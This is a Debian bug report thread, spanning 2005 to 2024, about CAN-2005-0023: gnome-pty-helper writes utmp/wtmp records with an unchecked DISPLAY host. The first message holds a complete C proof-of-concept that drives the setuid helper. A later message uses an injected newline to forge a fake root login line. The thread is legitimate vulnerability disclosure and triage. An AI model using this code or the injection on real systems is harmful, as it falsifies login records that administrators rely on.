Debian Bug report logs - #330907
[CAN-2005-0023] /usr/sbin/gnome-pty-helper: writes arbitrary utmp records

version graph

Package: vte; Maintainer for vte is Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>;

Reported by: Paul Szabo <psz@maths.usyd.edu.au>

Date: Mon, 19 Sep 2005 23:18:01 UTC

Severity: normal

Tags: fixed-upstream, help, security, upstream

Fixed in version 1:0.28.2-6

Done: Simon McVittie <smcv@debian.org>

Bug is archived. No further changes may be made.

Forwarded to http://bugzilla.gnome.org/show_bug.cgi?id=317312

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>:
Bug#329156; Package libzvt2. (full text, mbox, link).


Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
New Bug report received and forwarded. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>. (full text, mbox, link).


Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Tue, 20 Sep 2005 09:01:20 +1000
Package: libzvt2
Version: 1.4.2-19
Severity: critical
File: /usr/sbin/gnome-pty-helper
Justification: root security hole


gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
DISPLAY (host) settings. I am not sure if it can be tricked into erasing
existing records.

Demo output, code below.

Cheers,

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia


OUTPUT:

psz@savona:~$ gnome-pty-helper-exploit xyz & sleep 1; who; ps aux | grep psz; sleep 6; who
[1] 31444
Writing utmp (who) record for DISPLAY=xyz
Running who | grep xyz
psz      pts/2        Sep 20 08:40 (xyz)
utmp (who) record will be cleaned up when we exit.
To leave it behind, kill gnome-pty-helper: kill 31446
Sleeping for 5 secs...
psz      pts/2        Sep 20 08:40 (xyz)
psz      pts/1        Sep 20 08:33 (y622.yt.maths.usyd.edu.au:0.0)
USER       PID %CPU %MEM   VSZ  RSS TTY      STAT START   TIME COMMAND
psz      31358  0.0  0.3 10340 7768 ?        S    08:14   0:00 xterm -T psz@savona -n psz@savona -sb -sl 10000 -ls
psz      31444  0.0  0.0  1484  380 pts/1    S    08:21   0:00 gnome-pty-helper-exploit xyz
psz      31446  0.0  0.0  1696  604 pts/1    S    08:21   0:00 gnome-pty-helper
psz      31454  0.0  0.0  2496  848 pts/1    R+   08:21   0:00 ps aux
[1]+  Done                    gnome-pty-helper-exploit xyz
psz      pts/1        Sep 20 08:33 (y622.yt.maths.usyd.edu.au:0.0)


CODE:

/*
    Must be compiled against (within)
	gnome-libs-1.4.2/zvt
    because it uses *.h files from there.
    Code "stolen" from subshell.c .
*/

#include <sys/types.h>

#include "subshell-includes.h"
#define ZVT_TERM_DO_UTMP_LOG 1
#define ZVT_TERM_DO_WTMP_LOG 2
#define ZVT_TERM_DO_LASTLOG  4

/* Pid of the helper SUID process */
static pid_t helper_pid;

/* The socketpair used for the protocol */
int helper_socket_protocol  [2];

/* The parallel socketpair used to transfer file descriptors */
int helper_socket_fdpassing [2];

#include <sys/socket.h>
#include <sys/uio.h>

static struct cmsghdr *cmptr;
#define CONTROLLEN  sizeof (struct cmsghdr) + sizeof (int)

static int
receive_fd (int helper_fd)
{
	struct iovec iov [1];
	struct msghdr msg;
	char buf [32];
	
	iov [0].iov_base = buf;
	iov [0].iov_len  = sizeof (buf);
	msg.msg_iov      = iov;
	msg.msg_iovlen   = 1;
	msg.msg_name     = NULL;
	msg.msg_namelen  = 0;

	if (cmptr == NULL && (cmptr = malloc (CONTROLLEN)) == NULL)
		return -1;
	msg.msg_control = (caddr_t) cmptr;
	msg.msg_controllen = CONTROLLEN;

	if (recvmsg (helper_fd, &msg, 0) <= 0)
		return -1;

	return *(int *) CMSG_DATA (cmptr);
}

static int
s_pipe (int fd [2])
{
	return socketpair (AF_UNIX, SOCK_STREAM, 0, fd);
}

static void *
get_ptys (int *master, int *slave, int update_wutmp)
{
	GnomePtyOps op;
	int result, n;
	void *tag;
	
	if (helper_pid == -1)
		return NULL;

	if (helper_pid == 0){
		if (s_pipe (helper_socket_protocol) == -1)
			return NULL;

		if (s_pipe (helper_socket_fdpassing) == -1){
			close (helper_socket_protocol [0]);
			close (helper_socket_protocol [1]);
			return NULL;
		}
		
		helper_pid = fork ();
		
		if (helper_pid == -1){
			close (helper_socket_protocol [0]);
			close (helper_socket_protocol [1]);
			close (helper_socket_fdpassing [0]);
			close (helper_socket_fdpassing [1]);
			return NULL;
		}

		if (helper_pid == 0){
			close (0);
			close (1);
			dup2 (helper_socket_protocol  [1], 0);
			dup2 (helper_socket_fdpassing [1], 1);

			/* Close aliases */
			close (helper_socket_protocol  [0]);
			close (helper_socket_protocol  [1]);
			close (helper_socket_fdpassing [0]);
			close (helper_socket_fdpassing [1]);

			execl ("/usr/sbin/gnome-pty-helper", "gnome-pty-helper", NULL);
			exit (1);
		} else {
			close (helper_socket_fdpassing [1]);
			close (helper_socket_protocol  [1]);

			/*
			 * Set the close-on-exec flag for the other
			 * descriptors, these should never propagate
			 * (otherwise gnome-pty-heler wont notice when
			 * this process is killed).
			 */
			fcntl (helper_socket_protocol [0], F_SETFD, FD_CLOEXEC);
			fcntl (helper_socket_fdpassing [0], F_SETFD, FD_CLOEXEC);
		}
	}
	op = GNOME_PTY_OPEN_NO_DB_UPDATE;
	
	if (update_wutmp & ZVT_TERM_DO_UTMP_LOG){
		if (update_wutmp & (ZVT_TERM_DO_WTMP_LOG | ZVT_TERM_DO_LASTLOG))
			op = GNOME_PTY_OPEN_PTY_LASTLOGUWTMP;
		else if (update_wutmp & ZVT_TERM_DO_WTMP_LOG)
			op = GNOME_PTY_OPEN_PTY_UWTMP;
		else if (update_wutmp & ZVT_TERM_DO_LASTLOG)
			op = GNOME_PTY_OPEN_PTY_LASTLOGUTMP;
		else
			op = GNOME_PTY_OPEN_PTY_UTMP;
	} else if (update_wutmp & ZVT_TERM_DO_WTMP_LOG) {
		if (update_wutmp & (ZVT_TERM_DO_WTMP_LOG | ZVT_TERM_DO_LASTLOG))
			op = GNOME_PTY_OPEN_PTY_LASTLOGWTMP;
		else if (update_wutmp & ZVT_TERM_DO_WTMP_LOG)
			op = GNOME_PTY_OPEN_PTY_WTMP;
	} else
		if (update_wutmp & ZVT_TERM_DO_LASTLOG)
			op = GNOME_PTY_OPEN_PTY_LASTLOG;
	
	if (write (helper_socket_protocol [0], &op, sizeof (op)) < 0)
		return NULL;
	
	n = read (helper_socket_protocol [0], &result, sizeof (result));
	if (n == -1 || n != sizeof (result)){
		helper_pid = 0;
		return NULL;
	}
	
	if (result == 0)
		return NULL;

	n = read (helper_socket_protocol [0], &tag, sizeof (tag));
	
	if (n == -1 || n != sizeof (tag)){
		helper_pid = 0;
		return NULL;
	}

	*master = receive_fd (helper_socket_fdpassing [0]);
	*slave  = receive_fd (helper_socket_fdpassing [0]);
	
	return tag;
}

int main (int argc, char* argv[])
{
	int slave_pty, master_pty;
	void* mytag;
	int log = ZVT_TERM_DO_UTMP_LOG;
	char buf[1000];

printf("Writing utmp (who) record for DISPLAY=%s\n", argv[1]);
setenv("DISPLAY",argv[1],1);

	if ((mytag = get_ptys (&master_pty, &slave_pty, log)) == NULL)
		return;

sprintf(buf,"who | grep %s",argv[1]);
printf("Running %s\n",buf);
system(buf);
printf("utmp (who) record will be cleaned up when we exit.\n");
printf("To leave it behind, kill gnome-pty-helper: kill %d\n",helper_pid);

printf("Sleeping for 5 secs...\n");
sleep (5);
}



-- System Information:
Debian Release: 3.1
Architecture: i386 (i686)
Kernel: Linux 2.6.8-spm0.5
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)

Versions of packages libzvt2 depends on:
ii  gdk-imlib1             1.9.14-16.2       imaging library for use with gtk (
ii  libc6                  2.3.2.ds1-22      GNU C Library: Shared libraries an
ii  libglib1.2             1.2.10-9          The GLib library of C routines
ii  libgtk1.2              1.2.10-17         The GIMP Toolkit set of widgets fo
ii  libx11-6               4.3.0.dfsg.1-14   X Window System protocol client li
ii  xlibs                  4.3.0.dfsg.1-14   X Keyboard Extension (XKB) configu
ii  zlib1g                 1:1.2.2-4.sarge.2 compression library - runtime

-- no debconf information



Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>:
Bug#329156; Package libzvt2. (full text, mbox, link).


Acknowledgement sent to Steve Langasek <vorlon@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>. (full text, mbox, link).


Message #10 received at 329156@bugs.debian.org (full text, mbox, reply):

From: Steve Langasek <vorlon@debian.org>
To: Paul Szabo <psz@maths.usyd.edu.au>, 329156@bugs.debian.org
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Mon, 19 Sep 2005 17:44:05 -0700
[Message part 1 (text/plain, inline)]
On Tue, Sep 20, 2005 at 09:01:20AM +1000, Paul Szabo wrote:
> Package: libzvt2
> Version: 1.4.2-19
> Severity: critical
> File: /usr/sbin/gnome-pty-helper
> Justification: root security hole

> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
> existing records.

Why is this filed at severity: critical?  What is the attack vector here
which permits root privilege escalation?

-- 
Steve Langasek                   Give me a lever long enough and a Free OS
Debian Developer                   to set it on, and I can move the world.
vorlon@debian.org                                   http://www.debian.org/
[signature.asc (application/pgp-signature, inline)]

Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>:
Bug#329156; Package libzvt2. (full text, mbox, link).


Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>. (full text, mbox, link).


Message #15 received at 329156@bugs.debian.org (full text, mbox, reply):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: 329156@bugs.debian.org, vorlon@debian.org
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Tue, 20 Sep 2005 11:05:10 +1000
Steve,

>> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
>> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
>> existing records.
>
> Why is this filed at severity: critical?  What is the attack vector here
> which permits root privilege escalation?

I do not know any root escalation methods. When using reportbug, those
options seemed to fit best, apologies if they were not; please change if
appropriate. (For future reference: which options should I have used
instead?)

(In fact cannot think of any attacks: cannot think of any "important" uses
of utmp/wtmp files. I use utmp in some of my own scripts, that is how I
looked at gnome-tty-helper.)

Cheers, Paul

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia



Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>:
Bug#329156; Package libzvt2. (full text, mbox, link).


Acknowledgement sent to Steve Langasek <vorlon@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>. (full text, mbox, link).


Message #20 received at 329156@bugs.debian.org (full text, mbox, reply):

From: Steve Langasek <vorlon@debian.org>
To: Paul Szabo <psz@maths.usyd.edu.au>
Cc: 329156@bugs.debian.org
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Mon, 19 Sep 2005 21:17:10 -0700
[Message part 1 (text/plain, inline)]
On Tue, Sep 20, 2005 at 11:05:10AM +1000, Paul Szabo wrote:

> >> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> >> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
> >> existing records.

> > Why is this filed at severity: critical?  What is the attack vector here
> > which permits root privilege escalation?

> I do not know any root escalation methods. When using reportbug, those
> options seemed to fit best, apologies if they were not; please change if
> appropriate. (For future reference: which options should I have used
> instead?)

Hmm... After rereading the definition at
<http://www.debian.org/Bugs/Developer#severities>, I guess there's no reason
for this bug to not fall under the description of 'critical', since the
security hole is present just from the installation of the package.

Cheers,
-- 
Steve Langasek                   Give me a lever long enough and a Free OS
Debian Developer                   to set it on, and I can move the world.
vorlon@debian.org                                   http://www.debian.org/
[signature.asc (application/pgp-signature, inline)]

Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>:
Bug#329156; Package libzvt2. (full text, mbox, link).


Acknowledgement sent to Loïc Minier <lool@dooz.org>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>. (full text, mbox, link).


Message #25 received at 329156@bugs.debian.org (full text, mbox, reply):

From: Loïc Minier <lool@dooz.org>
To: Paul Szabo <psz@maths.usyd.edu.au>, 329156@bugs.debian.org
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Mon, 26 Sep 2005 10:37:48 +0200
        Hi,

On Tue, Sep 20, 2005, Paul Szabo wrote:
> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
> existing records.

 Thanks for your report.

 Do you have a CVE ID for this security issue?

 Did you check whether libvte4 is affected?

 Do you have a fix?

   Thanks,

-- 
Loïc Minier <lool@dooz.org>



Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>:
Bug#329156; Package libzvt2. (full text, mbox, link).


Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>. (full text, mbox, link).


Message #30 received at 329156@bugs.debian.org (full text, mbox, reply):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: 329156@bugs.debian.org, lool@dooz.org
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Mon, 26 Sep 2005 22:12:45 +1000
Dear Loic,

>  Do you have a CVE ID for this security issue?

No. Sorry, I do not know how to get one. (Nor am sure if this is serious
enough to deserve one.)

>  Did you check whether libvte4 is affected?

No. Do not know what libvte4 is.

>  Do you have a fix?

No. (Fanciful idea: try running xhost, if it fails then surely you do not
"own" that display. Slow, maybe secure. That is what I use now.)

Cheers,

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia



Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>:
Bug#329156; Package libzvt2. (full text, mbox, link).


Acknowledgement sent to Loïc Minier <lool@dooz.org>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>. (full text, mbox, link).


Message #35 received at 329156@bugs.debian.org (full text, mbox, reply):

From: Loïc Minier <lool@dooz.org>
To: Paul Szabo <psz@maths.usyd.edu.au>
Cc: 329156@bugs.debian.org
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Mon, 26 Sep 2005 14:18:19 +0200
On Mon, Sep 26, 2005, Paul Szabo wrote:
> No. Sorry, I do not know how to get one. (Nor am sure if this is serious
> enough to deserve one.)

 Then I'll see whether it deserves one, and attempt to request one.

> >  Did you check whether libvte4 is affected?
> No. Do not know what libvte4 is.

 libvte4 is the GNOME 2 zquivalent of libzvt2, you can grab it from:
    <http://packages.debian.org/>
 the source package for this library is "vte".

 I'd be nice if you could check whether the gnome-pty-helper shipped in
 libvte4 is affected too.  Let me know if you don't have a setup
 permitting the check, or if you lack the time.

   Bye,

-- 
Loïc Minier <lool@dooz.org>



Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>:
Bug#329156; Package libzvt2. (full text, mbox, link).


Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>. (full text, mbox, link).


Message #40 received at 329156@bugs.debian.org (full text, mbox, reply):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: lool@dooz.org
Cc: 329156@bugs.debian.org
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Mon, 26 Sep 2005 22:43:32 +1000
Dear Loic,

>> >  Did you check whether libvte4 is affected?
>> No. Do not know what libvte4 is.
>
> libvte4 is the GNOME 2 zquivalent of libzvt2 ...
> I'd be nice if you could check whether the gnome-pty-helper shipped in
> libvte4 is affected too.  Let me know if you don't have a setup
> permitting the check, or if you lack the time.

Looking at the source

  vte-0.11.15/gnome-pty-helper/gnome-pty-helper.c

in line 682 it grabs 
	display_name = getenv ("DISPLAY");
and uses it without any sanity checks: yes, surely it is also affected.

Cheers,

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia



Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>:
Bug#329156; Package libzvt2. (full text, mbox, link).


Acknowledgement sent to Matt Zimmerman <mdz@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>. (full text, mbox, link).


Message #45 received at 329156@bugs.debian.org (full text, mbox, reply):

From: Matt Zimmerman <mdz@debian.org>
To: 329156@bugs.debian.org
Subject: CVE name
Date: Mon, 26 Sep 2005 13:21:11 -0700
retitle 329156 [CAN-2005-0023] /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
thanks

Use CAN-2005-0023 for this issue.

-- 
 - mdz



Changed Bug title. Request was from Matt Zimmerman <mdz@debian.org> to control@bugs.debian.org. (full text, mbox, link).


Tags added: help Request was from Thomas Bushnell BSG <tb@becket.net> to control@bugs.debian.org. (full text, mbox, link).


Tags added: security Request was from Moritz Muehlenhoff <muehlenhoff@univention.de> to control@bugs.debian.org. (full text, mbox, link).


Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>:
Bug#329156; Package libzvt2. (full text, mbox, link).


Acknowledgement sent to Loïc Minier <lool@dooz.org>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>. (full text, mbox, link).


Message #56 received at 329156@bugs.debian.org (full text, mbox, reply):

From: Loïc Minier <lool@dooz.org>
To: Paul Szabo <psz@maths.usyd.edu.au>, 329156@bugs.debian.org, control@bugs.debian.org
Subject: Re: Bug#329156: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Fri, 30 Sep 2005 13:57:58 +0200
tags 329156 + upstream security
forwarded 329156 http://bugzilla.gnome.org/show_bug.cgi?id=317312
clone 329156 -1
reassign -1 libvte4
thanks

[ THIS IS A RESEND, PREVIOUS MAIL WAS LOST. ]

        Hi,

On Tue, Sep 20, 2005, Paul Szabo wrote:
> gnome-pty-helper can be made to write utmp/wtmp records with arbitrary
> DISPLAY (host) settings. I am not sure if it can be tricked into erasing
> existing records.

 This vulnerability is identified as CAN-2005-0023.  The upstream
 developers of vte have been notified of the bug at:
    <http://bugzilla.gnome.org/show_bug.cgi?id=317312>

     Bye,
-- 
Loïc Minier <lool@dooz.org>



Tags added: upstream, security Request was from Loïc Minier <lool@dooz.org> to control@bugs.debian.org. (full text, mbox, link).


Noted your statement that Bug has been forwarded to http://bugzilla.gnome.org/show_bug.cgi?id=317312. Request was from Loïc Minier <lool@dooz.org> to control@bugs.debian.org. (full text, mbox, link).


Bug 329156 cloned as bug 330907. Request was from Loïc Minier <lool@dooz.org> to control@bugs.debian.org. (full text, mbox, link).


Bug reassigned from package `libzvt2' to `libvte4'. Request was from Loïc Minier <lool@dooz.org> to control@bugs.debian.org. (full text, mbox, link).


Information forwarded to debian-bugs-dist@lists.debian.org, Arnaud Patard <arnaud.patard@rtp-net.org>:
Bug#330907; Package libvte4. (full text, mbox, link).


Acknowledgement sent to Loïc Minier <lool@dooz.org>:
Extra info received and forwarded to list. Copy sent to Arnaud Patard <arnaud.patard@rtp-net.org>. (full text, mbox, link).


Message #69 received at 330907@bugs.debian.org (full text, mbox, reply):

From: Loïc Minier <lool@dooz.org>
To: 330907@bugs.debian.org, control@bugs.debian.org
Subject: Re: gnome-pty-helper foo
Date: Sat, 8 Oct 2005 20:35:21 +0200
# downgrading the clone too
severity 330907 normal
thanks

On ven, oct 07, 2005, Martin Schulze wrote:
> severity 329156 normal
> thanks dude
> 
> Loïc Minier wrote:
> >         Hi,
> > 
> > On Fri, Oct 07, 2005, Martin Schulze wrote:
> > > Could somebody explain the security implication for me?
> > 
> >  You can record in the utmp/wtmp logs something which is wrong, for
> >  example that an user is currently connected to a display while he
> >  isn't.  I'm not the one to argue with though.
> 
> Ok, so unless somebody proves us wrong we don't consider this a
> security problem.
> 
> Regards,
> 
> 	Joey
> 
> -- 
> Everybody talks about it, but nobody does anything about it!  -- Mark Twain
> 
> Please always Cc to me when replying to me on the lists.
> 

-- 
Loïc Minier <lool@dooz.org>



Severity set to `normal'. Request was from Loïc Minier <lool@dooz.org> to control@bugs.debian.org. (full text, mbox, link).


Information forwarded to debian-bugs-dist@lists.debian.org, Arnaud Patard <arnaud.patard@rtp-net.org>:
Bug#330907; Package libvte4. (full text, mbox, link).


Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to Arnaud Patard <arnaud.patard@rtp-net.org>. (full text, mbox, link).


Message #76 received at 330907@bugs.debian.org (full text, mbox, reply):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: 329156@bugs.debian.org, 330907@bugs.debian.org
Subject: Re: gnome-pty-helper foo
Date: Wed, 12 Oct 2005 12:21:18 +1000
I have not yet found any uses for utmp/wtmp: maybe Joey is right and there
is no security issue. I would then suggest that to increase security,
setuid/setgid bits be removed from all utmp/wmtp maintainers.

In the meantime, I hope that conscientious sysadmins do look at who and
last output occasionally; an expect that

psz@savona:~$ exploit "$(perl -e 'print "XX)\nroot     tty01        Jan 01 02:03 (insecure.com"')" & sleep 1; who; sleep 6
[1] 22149
Writing utmp (who) record ...
utmp record will be cleaned up when we exit.
To leave it behind, kill gnome-pty-helper: kill 22152
Sleeping for 5 secs...
psz      pts/2        Oct 12 12:16 (XX)
root     tty01        Jan 01 02:03 (insecure.com)
psz      pts/1        Oct 12 11:37 (y622.yt.maths.usyd.edu.au:0.0)
[1]+  Done                    exploit "$(perl -e 'print "XX)\nroot     tty01        Jan 01 02:03 (insecure.com"')"
psz@savona:~$ 

should suitably freak them out.

Cheers,

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia



Information forwarded to debian-bugs-dist@lists.debian.org, gpastore@debian.org (Guilherme de S. Pastore):
Bug#330907; Package libvte4. (Tue, 30 Dec 2008 08:00:03 GMT) (full text, mbox, link).


Acknowledgement sent to Paul Szabo <psz@maths.usyd.edu.au>:
Extra info received and forwarded to list. Copy sent to gpastore@debian.org (Guilherme de S. Pastore). (Tue, 30 Dec 2008 08:00:03 GMT) (full text, mbox, link).


Message #81 received at 330907@bugs.debian.org (full text, mbox, reply):

From: Paul Szabo <psz@maths.usyd.edu.au>
To: 329156@bugs.debian.org, 330907@bugs.debian.org
Subject: Re: gnome-pty-helper foo
Date: Tue, 30 Dec 2008 18:58:50 +1100
On 12 Oct 2005 (a long time ago!) I wrote:

> I have not yet found any uses for utmp/wtmp ...

I found a (wrongful) use for it recently, /bin/login relies on ut_line
and chowns that to the user, see

  http://bugs.debian.org/505271

That is "not this bug", as this allows us to fake ut_host only...

Cheers,

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia




Bug reassigned from package `libvte4' to `vte'. Request was from Marco Rodrigues <gothicx@sapo.pt> to control@bugs.debian.org. (Sat, 21 Mar 2009 15:12:06 GMT) (full text, mbox, link).


Information forwarded to debian-bugs-dist@lists.debian.org, gpastore@debian.org (Guilherme de S. Pastore):
Bug#330907; Package vte. (Sat, 21 Mar 2009 22:09:02 GMT) (full text, mbox, link).


Acknowledgement sent to Marco Rodrigues <gothicx@sapo.pt>:
Extra info received and forwarded to list. Copy sent to gpastore@debian.org (Guilherme de S. Pastore). (Sat, 21 Mar 2009 22:09:02 GMT) (full text, mbox, link).


Message #88 received at 330907@bugs.debian.org (full text, mbox, reply):

From: Marco Rodrigues <gothicx@sapo.pt>
To: 330907@bugs.debian.org, 144904@bugs.debian.org, 276575@bugs.debian.org, 143604@bugs.debian.org, control@bugs.debian.org, vte@packages.debian.org
Subject: Reassigning bugs from libvte4 to vte
Date: Sat, 21 Mar 2009 15:11:01 GMT
reassign 330907 vte
reassign 144904 vte
reassign 276575 vte
reassign 143604 vte
thanks

The libvte4 package has been removed from Debian. We are reassigning 
its bugs to the vte package. Please have a look at them, 
and close them if they don't apply to vte anymore.

Don't hesitate to reply to this mail if you have any question.

Kind regards,
--
Marco Rodrigues




Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>:
Bug#330907; Package vte. (Thu, 04 Oct 2012 02:27:05 GMT) (full text, mbox, link).


Acknowledgement sent to paul.szabo@sydney.edu.au:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>. (Thu, 04 Oct 2012 02:27:05 GMT) (full text, mbox, link).


Message #93 received at 330907@bugs.debian.org (full text, mbox, reply):

From: paul.szabo@sydney.edu.au
To: 329156@bugs.debian.org, 330907@bugs.debian.org
Subject: utempter also allows fake host
Date: Thu, 4 Oct 2012 12:17:12 +1000
Please see
http://bugs.debian.org/689562
about utempter also allowing setting a fake host.

Cheers, Paul

Paul Szabo   psz@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia



Added tag(s) fixed-upstream. Request was from bts-link-upstream@lists.alioth.debian.org to control@bugs.debian.org. (Mon, 11 May 2015 16:54:17 GMT) (full text, mbox, link).


Information forwarded to debian-bugs-dist@lists.debian.org, Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>:
Bug#330907; Package vte. (Wed, 23 Nov 2016 21:36:06 GMT) (full text, mbox, link).


Acknowledgement sent to Egmont Koblinger <egmont@gmail.com>:
Extra info received and forwarded to list. Copy sent to Debian GNOME Maintainers <pkg-gnome-maintainers@lists.alioth.debian.org>. (Wed, 23 Nov 2016 21:36:06 GMT) (full text, mbox, link).


Message #100 received at 330907@bugs.debian.org (full text, mbox, reply):

From: Egmont Koblinger <egmont@gmail.com>
To: 330907@bugs.debian.org, 329156@bugs.debian.org
Subject: Re: /usr/sbin/gnome-pty-helper: writes arbitrary utmp records
Date: Wed, 23 Nov 2016 22:33:13 +0100
[Message part 1 (text/plain, inline)]
FYI:

VTE (Debian package name: libvte-2.91-0) no longer ships gnome-pty-helper
as of version 0.42.

VTE, and in turn gnome-terminal, no longer does utmp/wtmp logging at all.

See https://git.gnome.org/browse/vte/commit/?id=299c700 and
https://bugzilla.gnome.org/show_bug.cgi?id=747046 for further details.

cheers,
egmont
[Message part 2 (text/html, inline)]

Reply sent to Simon McVittie <smcv@debian.org>:
You have taken responsibility. (Thu, 19 Sep 2024 18:09:22 GMT) (full text, mbox, link).


Notification sent to Paul Szabo <psz@maths.usyd.edu.au>:
Bug acknowledged by developer. (Thu, 19 Sep 2024 18:09:22 GMT) (full text, mbox, link).


Message #105 received at 330907-done@bugs.debian.org (full text, mbox, reply):

From: Simon McVittie <smcv@debian.org>
To: 330907-done@bugs.debian.org
Subject: Re: Bug#330907: gnome-pty-helper: writes arbitrary utmp records
Date: Thu, 19 Sep 2024 19:08:00 +0100
Version: 1:0.28.2-6

On Tue, 20 Sep 2005 at 09:01:20 +1000, Paul Szabo wrote:
> gnome-pty-helper can be made to write utmp/wtmp records

Since 2019 (before Debian 11), the vte source package in Debian no longer
installs gnome-pty-helper, so any remaining bugs in gnome-pty-helper
are no longer relevant to its security posture.

For all purposes except the GTK2-based Debian installer, vte has been
replaced by the GTK3/GTK4-based vte2.91, but that package also stopped
providing gnome-pty-helper in 2015 (version 0.42.0-1).

libzvt was also removed from Debian, back in 2008.

So there is no longer a gnome-pty-helper in any supported branch of
Debian, in any descendant of the libzvt package in which CVE-2005-0023
was originally reported, and I'm closing this bug now.

    smcv



Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Fri, 18 Oct 2024 07:24:33 GMT) (full text, mbox, link).


Send a report that this bug log contains spam.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Sat Apr 19 05:05:09 2025; Machine Name: buxtehude

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU General Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.